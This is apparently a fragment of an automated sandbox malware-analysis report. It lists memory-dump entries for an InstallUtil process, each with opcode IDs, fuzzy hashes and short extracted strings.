                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: {\-$"{\-$>{\-$Z{\-$x{\-$x\-
                                • API String ID: 0-3744525720
                                • Opcode ID: d569bfcfb163ddd6eeec363fc446aeb68093960a339e1b5a5cd0c196e85bd799
                                • Instruction ID: 2b9bf5d7db2c05dd2cae62644ac647a72bf425c99824be59aeeb58329fb56720
                                • Opcode Fuzzy Hash: d569bfcfb163ddd6eeec363fc446aeb68093960a339e1b5a5cd0c196e85bd799
                                • Instruction Fuzzy Hash: 27517435F112155BDB58FBB8D4A07EE76F7FBC8650F10842AE506EB780EE609C018791
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: ]\-$6]\-$R]\-$a]\-$q]\-
                                • API String ID: 0-1053814404
                                • Opcode ID: 6b3fc2c6f07f94c1e043ca4d40ede2ca7ae441dabd638e2bab9a368fecdb66d5
                                • Instruction ID: c82c4a7283deab5592f723e7c19405ff5dddfabafd1d9273882c730911e47bed
                                • Opcode Fuzzy Hash: 6b3fc2c6f07f94c1e043ca4d40ede2ca7ae441dabd638e2bab9a368fecdb66d5
                                • Instruction Fuzzy Hash: 65619234B002159FDB58EBB8D864AAEB7F6FF89650F148569E406EF391EA70DC00C791
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: ,s\-$Nq\-$Sq\-$hq\-$q\-
                                • API String ID: 0-1214977662
                                • Opcode ID: 5ec8c5527fec71b07a69eaca34225c42fed74033f61659e788c664e5e5951ea2
                                • Instruction ID: 6372f5633de25fe159f4c2eb78d8bfed7e11977160081f1c68434647c7dcb720
                                • Opcode Fuzzy Hash: 5ec8c5527fec71b07a69eaca34225c42fed74033f61659e788c664e5e5951ea2
                                • Instruction Fuzzy Hash: 64712A74A013198FDB58EBA8C5646AEB7F6FF94340F208429E406EF794DB309C45CBA1
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: =\\-$n\\-$y\\-$]\-
                                • API String ID: 0-143182104
                                • Opcode ID: 1ff685fad1f3be02f542f9c3a31b1f1109234846b63e2f14c66b3f79bb30acdb
                                • Instruction ID: 88c8bf9933cc42e5d8c13bab936bfb9802e667f7b546b69b125367ca24c0daf8
                                • Opcode Fuzzy Hash: 1ff685fad1f3be02f542f9c3a31b1f1109234846b63e2f14c66b3f79bb30acdb
                                • Instruction Fuzzy Hash: 99B11D34E012198BDB98EBB8C8946AEB7F2BF84354F248429D406EF355DB75DC42CB91
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: =\\-$n\\-$y\\-$]\-
                                • API String ID: 0-143182104
                                • Opcode ID: a1b2771a7b44f0139e260d8b243bdc3b4ed514dccaf008b44b24826beda8264a
                                • Instruction ID: 64e25b444f90f2ca5ca043400bec6a89ed03378f62be4c0ad9b586990f8af589
                                • Opcode Fuzzy Hash: a1b2771a7b44f0139e260d8b243bdc3b4ed514dccaf008b44b24826beda8264a
                                • Instruction Fuzzy Hash: 9DB16F34F012158BDB98EBB4C8906AEB7F2AF84354F248469E406EF355EB75DC42CB91
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: ^\-$/^\-$0^\-$t^\-
                                • API String ID: 0-1740364902
                                • Opcode ID: 3955b5bccb90cd84a30d592ab9d7ee776f17d6661c922f6dc6409fce99aae6f5
                                • Instruction ID: 1be93b9a77b1da7918d2f43a2acff5655d705e030c470fb74052d8df53083411
                                • Opcode Fuzzy Hash: 3955b5bccb90cd84a30d592ab9d7ee776f17d6661c922f6dc6409fce99aae6f5
                                • Instruction Fuzzy Hash: 7E41E3317001159BDB89F779C8647AEB6E7AFC5250F144029E50ACF381EE34DD418BE5
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: OK\-$PK\-$bK\-$tK\-
                                • API String ID: 0-3114378581
                                • Opcode ID: 958bd431893716b58d5dc08d9089fb6084313b5be58d30f25a225f2efa88dc71
                                • Instruction ID: fa0c79e87ac250b11ea1ac223ea6cf1b0666728d7c51d72440920f5d23c2e2b3
                                • Opcode Fuzzy Hash: 958bd431893716b58d5dc08d9089fb6084313b5be58d30f25a225f2efa88dc71
                                • Instruction Fuzzy Hash: A7419034F11219DFEB68EBB4D5647AEB6F6AF88640F108129E406EB254DF749C40CBA1